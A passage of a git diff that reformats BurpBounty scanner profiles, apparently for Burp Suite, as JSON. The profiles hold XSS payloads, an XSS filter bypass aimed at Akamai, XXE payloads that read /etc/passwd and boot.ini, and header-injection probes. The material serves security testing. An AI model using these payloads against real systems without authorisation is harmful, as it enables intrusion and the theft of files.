{PAYLOAD}","regex":"String"},{"type":"Request","match":"","replace":"X-Host: {PAYLOAD}","regex":"String"},{"type":"Request","match":"","replace":"X-Forwarded-Server: {PAYLOAD}","regex":"String"},{"type":"Request","match":"","replace":"X-Forwarded-Scheme: {PAYLOAD}","regex":"String"},{"type":"Request","match":"","replace":"X-Original-URL: {PAYLOAD}","regex":"String"},{"type":"Request","match":"","replace":"X-Rewrite-URL: {PAYLOAD}","regex":"String"}],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "X-Headers-Collaborator", + "Name": "", + "Enabled": true, + "Scanner": 1, + "Author": "@egarme", + "Payloads": [ + "true,http://{BC}" + ], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [], + "Tags": [ + "Collaborator", + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 0, + "RedirType": 1, + "MaxRedir": 0, + "payloadPosition": 1, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "X-Headers-Collaborator", + "IssueSeverity": "High", + "IssueConfidence": "Certain", + "IssueDetail": "X-Headers-Collaborator", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [ + { + "type": "Request", + "match": "", + "replace": "X-Forwarded-For: {PAYLOAD}", + "regex": "String" + }, + { + "type": "Request", + "match": "", + "replace": "X-Host: {PAYLOAD}", + "regex": "String" + }, + { + "type": "Request", + "match": "", + "replace": "X-Forwarded-Server: {PAYLOAD}", + "regex": "String" + }, + { + "type": "Request", + "match": "", + "replace": "X-Forwarded-Scheme: {PAYLOAD}", + "regex": "String" + }, + { + "type": "Request", + "match": "", + "replace": "X-Original-URL: {PAYLOAD}", + "regex": "String" + }, + { + "type": "Request", + "match": "", + "replace": "X-Rewrite-URL: {PAYLOAD}", + "regex": "String" + } + ], + "VariationAttributes": [], + "InsertionPointType": [ + 18, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127 + ], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/X-XSS-Protection.bb b/profiles/X-XSS-Protection.bb new file mode 100755 index 0000000..d7325ea --- /dev/null +++ b/profiles/X-XSS-Protection.bb @@ -0,0 +1,59 @@ +[ + { + "ProfileName": "X-XSS-Protection", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@egarme", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,X-XSS-Protection: 1;" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": true, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": true, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 1, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "X-XSS-Protection", + "IssueSeverity": "Information", + "IssueConfidence": "Firm", + "IssueDetail": "Security Header \"X-XSS-Protection\" not present in response.", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/XSS - Akamai GHost bypass.bb b/profiles/XSS - Akamai GHost bypass.bb new file mode 100755 index 0000000..704122c --- /dev/null +++ b/profiles/XSS - Akamai GHost bypass.bb @@ -0,0 +1,97 @@ +[ + { + "ProfileName": "XSS - Akamai GHost bypass", + "Name": "", + "Enabled": true, + "Scanner": 1, + "Author": "@egarme", + "Payloads": [ + "true,\u003cdETAILS%0aopen%0aonToGgle%0a\u003d%0aa\u003dprompt,a()x\u003e" + ], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,\u003cdETAILS" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": true, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "text/plain", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 0, + "RedirType": 4, + "MaxRedir": 0, + "payloadPosition": 1, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "XSS - Akamai GHost bypass", + "IssueSeverity": "Medium", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [ + 18, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127 + ], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/XSS-Akamai_GHost_bypass.bb b/profiles/XSS-Akamai_GHost_bypass.bb deleted file mode 100755 index 5b41461..0000000 --- a/profiles/XSS-Akamai_GHost_bypass.bb +++ /dev/null @@ -1 +0,0 @@ -[{"Name":"XSS-Akamai_GHost_bypass","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["\u003cdETAILS%0aopen%0aonToGgle%0a\u003d%0aa\u003dprompt,a()x\u003e"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,\u003cdETAILS"],"Tags":["XSS","All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":true,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/plain","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":4,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"XSS - Akamai GHost bypass","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file diff --git a/profiles/XSS.bb b/profiles/XSS.bb index 4908113..169e961 100755 --- a/profiles/XSS.bb +++ b/profiles/XSS.bb @@ -1 +1,104 @@ -[{"Name":"XSS","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["\u003c/script\u003e\u003cscript\u003econfirm(1)\u003c/script\u003e","\"\u003e\u003cimg src\u003dx onerror\u003dprompt(1);\u003e.","\u003cSCRIPT\u003ea\u003d/XSS/.alert(a.source)\u003c/SCRIPT\u003e","\u003csvg oNLoAd\u003dalert(\u0027XSS\u0027)\u003e","\u003csvg/oNLoAd\u003dalert(1)\u003e","\"\u003e\u003cSCRIPT\u003ea\u003d/XSS/.alert(a.source)\u003c/SCRIPT\u003e\u003c!--","\u003csvg\u003e\u003cscript\u003ealert\u0026#40/1/.source\u0026#41\u003c/script\u003e\u003c/svg\u003e","javascript:/*--\u003e\u003c/title\u003e\u003c/style\u003e\u003c/textarea\u003e\u003c/script\u003e\u003c/xmp\u003e\u003csvg/onload\u003d\u0027+/\"/+/onmouseover\u003d1/+/[*/[]/+alert(11)//\u0027\u003e","\u003cmarquee loop\u003d1 width\u003d0 onfinish\u003dalert(2)\u003e"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":[],"Tags":["XSS","All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":true,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/plain,text/fragment+html,application/json","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":3,"RedirType":4,"MaxRedir":5,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"XSS","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"XSS with payloads: \u003cpayload\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "XSS", + "Name": "", + "Enabled": true, + "Scanner": 1, + "Author": "@egarme", + "Payloads": [ + "true,\u003c/script\u003e\u003cscript\u003econfirm(1)\u003c/script\u003e", + "true,\"\u003e\u003cimg src\u003dx onerror\u003dprompt(1);\u003e.", + "true,\u003cSCRIPT\u003ea\u003d/XSS/.alert(a.source)\u003c/SCRIPT\u003e", + "true,\u003csvg oNLoAd\u003dalert(\u0027XSS\u0027)\u003e", + "true,\u003csvg/oNLoAd\u003dalert(1)\u003e", + "true,\"\u003e\u003cSCRIPT\u003ea\u003d/XSS/.alert(a.source)\u003c/SCRIPT\u003e\u003c!--", + "true,\u003csvg\u003e\u003cscript\u003ealert\u0026#40/1/.source\u0026#41\u003c/script\u003e\u003c/svg\u003e", + "true,javascript:/*--\u003e\u003c/title\u003e\u003c/style\u003e\u003c/textarea\u003e\u003c/script\u003e\u003c/xmp\u003e\u003csvg/onload\u003d\u0027+/\"/+/onmouseover\u003d1/+/[*/[]/+alert(11)//\u0027\u003e", + "true,\u003cmarquee loop\u003d1 width\u003d0 onfinish\u003dalert(2)\u003e" + ], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [], + "Tags": [ + "XSS", + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": true, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/plain,text/fragment+html,application/json", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 3, + "Scope": 0, + "RedirType": 4, + "MaxRedir": 5, + "payloadPosition": 1, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "XSS", + "IssueSeverity": "Medium", + "IssueConfidence": "Certain", + "IssueDetail": "XSS with payloads: \u003cpayload\u003e", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [ + 18, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127 + ], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/XSSHtmlUrlEncode.bb b/profiles/XSSHtmlUrlEncode.bb index d17fe2a..8006d10 100755 --- a/profiles/XSSHtmlUrlEncode.bb +++ b/profiles/XSSHtmlUrlEncode.bb @@ -1 +1,107 @@ -[{"Name":"XSSHtmlUrlEncode","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["\u003c/script\u003e\u003cscript\u003econfirm(1)\u003c/script\u003e","\"\u003e\u003cimg src\u003dx onerror\u003dprompt(1);\u003e.","\u003cSCRIPT\u003ea\u003d/XSS/.alert(a.source)\u003c/SCRIPT\u003e","\u003csvg oNLoAd\u003dalert(\u0027XSS\u0027)\u003e","\u003csvg/oNLoAd\u003dalert(1)\u003e","\"\u003e\u003cSCRIPT\u003ea\u003d/XSS/.alert(a.source)\u003c/SCRIPT\u003e\u003c!--","\u003csvg\u003e\u003cscript\u003ealert\u0026#40/1/.source\u0026#41\u003c/script\u003e\u003c/svg\u003e","javascript:/*--\u003e\u003c/title\u003e\u003c/style\u003e\u003c/textarea\u003e\u003c/script\u003e\u003c/xmp\u003e\u003csvg/onload\u003d\u0027+/\"/+/onmouseover\u003d1/+/[*/[]/+alert(11)//\u0027\u003e","\u003csvg \u003c/onload \u003d\"1\u003e (_\u003dalert,_(1337)) \"\"\u003e","\u003cmarquee loop\u003d1 width\u003d0 onfinish\u003dalert(2)\u003e"],"Encoder":["HTML-encode all characters"],"UrlEncode":true,"CharsToUrlEncode":"\u0026;#","Grep":[],"Tags":["XSS","All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":true,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/html","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":4,"RedirType":4,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"XSSHtmlUrlEncode","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "XSSHtmlUrlEncode", + "Name": "", + "Enabled": true, + "Scanner": 1, + "Author": "@egarme", + "Payloads": [ + "true,\u003c/script\u003e\u003cscript\u003econfirm(1)\u003c/script\u003e", + "true,\"\u003e\u003cimg src\u003dx onerror\u003dprompt(1);\u003e.", + "true,\u003cSCRIPT\u003ea\u003d/XSS/.alert(a.source)\u003c/SCRIPT\u003e", + "true,\u003csvg oNLoAd\u003dalert(\u0027XSS\u0027)\u003e", + "true,\u003csvg/oNLoAd\u003dalert(1)\u003e", + "true,\"\u003e\u003cSCRIPT\u003ea\u003d/XSS/.alert(a.source)\u003c/SCRIPT\u003e\u003c!--", + "true,\u003csvg\u003e\u003cscript\u003ealert\u0026#40/1/.source\u0026#41\u003c/script\u003e\u003c/svg\u003e", + "true,javascript:/*--\u003e\u003c/title\u003e\u003c/style\u003e\u003c/textarea\u003e\u003c/script\u003e\u003c/xmp\u003e\u003csvg/onload\u003d\u0027+/\"/+/onmouseover\u003d1/+/[*/[]/+alert(11)//\u0027\u003e", + "true,\u003csvg \u003c/onload \u003d\"1\u003e (_\u003dalert,_(1337)) \"\"\u003e", + "true,\u003cmarquee loop\u003d1 width\u003d0 onfinish\u003dalert(2)\u003e" + ], + "Encoder": [ + "HTML-encode all characters" + ], + "UrlEncode": true, + "CharsToUrlEncode": "\u0026;#", + "Grep": [], + "Tags": [ + "XSS", + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": true, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/html", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 4, + "Scope": 0, + "RedirType": 4, + "MaxRedir": 0, + "payloadPosition": 1, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "XSSHtmlUrlEncode", + "IssueSeverity": "Medium", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [ + 18, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127 + ], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/XSSUrlEncode.bb b/profiles/XSSUrlEncode.bb index b0260c1..151fb82 100755 --- a/profiles/XSSUrlEncode.bb +++ b/profiles/XSSUrlEncode.bb @@ -1 +1,106 @@ -[{"Name":"XSSUrlEncode","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["\u003c/script\u003e\u003cscript\u003econfirm(1)\u003c/script\u003e","\"\u003e\u003cimg src\u003dx onerror\u003dprompt(1);\u003e.","\u003cSCRIPT\u003ea\u003d/XSS/.alert(a.source)\u003c/SCRIPT\u003e","\u003csvg oNLoAd\u003dalert(\u0027XSS\u0027)\u003e","\u003csvg/oNLoAd\u003dalert(1)\u003e","\"\u003e\u003cSCRIPT\u003ea\u003d/XSS/.alert(a.source)\u003c/SCRIPT\u003e\u003c!--","\u003csvg\u003e\u003cscript\u003ealert\u0026#40/1/.source\u0026#41\u003c/script\u003e\u003c/svg\u003e","javascript:/*--\u003e\u003c/title\u003e\u003c/style\u003e\u003c/textarea\u003e\u003c/script\u003e\u003c/xmp\u003e\u003csvg/onload\u003d\u0027+/\"/+/onmouseover\u003d1/+/[*/[]/+alert(11)//\u0027\u003e","\u003cmarquee loop\u003d1 width\u003d0 onfinish\u003dalert(2)\u003e"],"Encoder":["URL-encode key characters"],"UrlEncode":false,"CharsToUrlEncode":"","Grep":[],"Tags":["XSS","All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":true,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/plain,text/fragment+html,application/json","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":4,"RedirType":4,"MaxRedir":4,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"XSSUrlEncode","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"XSS with payloads: \u003cbr\u003e \u003cpayload\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "XSSUrlEncode", + "Name": "", + "Enabled": true, + "Scanner": 1, + "Author": "@egarme", + "Payloads": [ + "true,\u003c/script\u003e\u003cscript\u003econfirm(1)\u003c/script\u003e", + "true,\"\u003e\u003cimg src\u003dx onerror\u003dprompt(1);\u003e.", + "true,\u003cSCRIPT\u003ea\u003d/XSS/.alert(a.source)\u003c/SCRIPT\u003e", + "true,\u003csvg oNLoAd\u003dalert(\u0027XSS\u0027)\u003e", + "true,\u003csvg/oNLoAd\u003dalert(1)\u003e", + "true,\"\u003e\u003cSCRIPT\u003ea\u003d/XSS/.alert(a.source)\u003c/SCRIPT\u003e\u003c!--", + "true,\u003csvg\u003e\u003cscript\u003ealert\u0026#40/1/.source\u0026#41\u003c/script\u003e\u003c/svg\u003e", + "true,javascript:/*--\u003e\u003c/title\u003e\u003c/style\u003e\u003c/textarea\u003e\u003c/script\u003e\u003c/xmp\u003e\u003csvg/onload\u003d\u0027+/\"/+/onmouseover\u003d1/+/[*/[]/+alert(11)//\u0027\u003e", + "true,\u003cmarquee loop\u003d1 width\u003d0 onfinish\u003dalert(2)\u003e" + ], + "Encoder": [ + "URL-encode key characters" + ], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [], + "Tags": [ + "XSS", + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": true, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/plain,text/fragment+html,application/json", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 4, + "Scope": 0, + "RedirType": 4, + "MaxRedir": 4, + "payloadPosition": 1, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "XSSUrlEncode", + "IssueSeverity": "Medium", + "IssueConfidence": "Certain", + "IssueDetail": "XSS with payloads: \u003cbr\u003e \u003cpayload\u003e", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [ + 18, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127 + ], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/XXE.bb b/profiles/XXE.bb index 9b843b3..6dd17d1 100755 --- a/profiles/XXE.bb +++ b/profiles/XXE.bb @@ -1 +1,103 @@ -[{"Name":"XXE","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["\u003c?xml version\u003d\"1.0\" encoding\u003d\"ISO-8859-1\"?\u003e\u003c!DOCTYPE foo [\u003c!ELEMENT foo ANY\u003e\u003c!ENTITY xxe SYSTEM \"file:///etc/passwd\"\u003e]\u003e\u003cfoo\u003e\u0026xee;\u003c/foo\u003e","\u003c?xml version\u003d\"1.0\" encoding\u003d\"ISO-8859-1\"?\u003e\u003c!DOCTYPE foo [\u003c!ELEMENT foo ANY\u003e\u003c!ENTITY xxe SYSTEM \"file://c:/boot.ini\"\u003e]\u003e\u003cfoo\u003e\u0026xee;\u003c/foo\u003e","\u003c!DOCTYPE foo [ \u003c!ENTITY % xxe SYSTEM \"data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk\"\u003e]\u003e\u003cfoo/\u003e","\u003c?xml version\u003d\"1.0\" encoding\u003d\"ISO-8859-1\"?\u003e\u003c!DOCTYPE foo [\u003c!ENTITY xxe SYSTEM \"php://filter/convert.base64-encode/resource\u003d/etc/passwd\"\u003e]\u003e\u003cfoo\u003e\u0026xee;\u003c/foo\u003e"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,root:x","true,Or,boot loader","true,Or,cm9vdD"],"Tags":["XXE","All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"XXE","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"XXE found with: \u003cbr\u003e \u003cpayload\u003e ","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "XXE", + "Name": "", + "Enabled": true, + "Scanner": 1, + "Author": "@egarme", + "Payloads": [ + "true,\u003c?xml version\u003d\"1.0\" encoding\u003d\"ISO-8859-1\"?\u003e\u003c!DOCTYPE foo [\u003c!ELEMENT foo ANY\u003e\u003c!ENTITY xxe SYSTEM \"file:///etc/passwd\"\u003e]\u003e\u003cfoo\u003e\u0026xee;\u003c/foo\u003e", + "true,\u003c?xml version\u003d\"1.0\" encoding\u003d\"ISO-8859-1\"?\u003e\u003c!DOCTYPE foo [\u003c!ELEMENT foo ANY\u003e\u003c!ENTITY xxe SYSTEM \"file://c:/boot.ini\"\u003e]\u003e\u003cfoo\u003e\u0026xee;\u003c/foo\u003e", + "true,\u003c!DOCTYPE foo [ \u003c!ENTITY % xxe SYSTEM \"data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk\"\u003e]\u003e\u003cfoo/\u003e", + "true,\u003c?xml version\u003d\"1.0\" encoding\u003d\"ISO-8859-1\"?\u003e\u003c!DOCTYPE foo [\u003c!ENTITY xxe SYSTEM \"php://filter/convert.base64-encode/resource\u003d/etc/passwd\"\u003e]\u003e\u003cfoo\u003e\u0026xee;\u003c/foo\u003e" + ], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,root:x", + "true,Or,boot loader", + "true,Or,cm9vdD" + ], + "Tags": [ + "XXE", + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 0, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 1, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "XXE", + "IssueSeverity": "High", + "IssueConfidence": "Certain", + "IssueDetail": "XXE found with: \u003cbr\u003e \u003cpayload\u003e ", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [ + 18, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127 + ], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Youtube_Channel_ID.bb b/profiles/Youtube_Channel_ID.bb old mode 100644 new mode 100755 index 200b570..3845bdc --- a/profiles/Youtube_Channel_ID.bb +++ b/profiles/Youtube_Channel_ID.bb @@ -1 +1,59 @@ -[{"Name":"Youtube_Channel_ID","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,https?:\\/\\/(www\\.)?youtube.com\\/channel\\/UC([-_a-z0-9]{22})"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Youtube Channel ID","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Youtube_Channel_ID", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,https?:\\/\\/(www\\.)?youtube.com\\/channel\\/UC([-_a-z0-9]{22})" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + 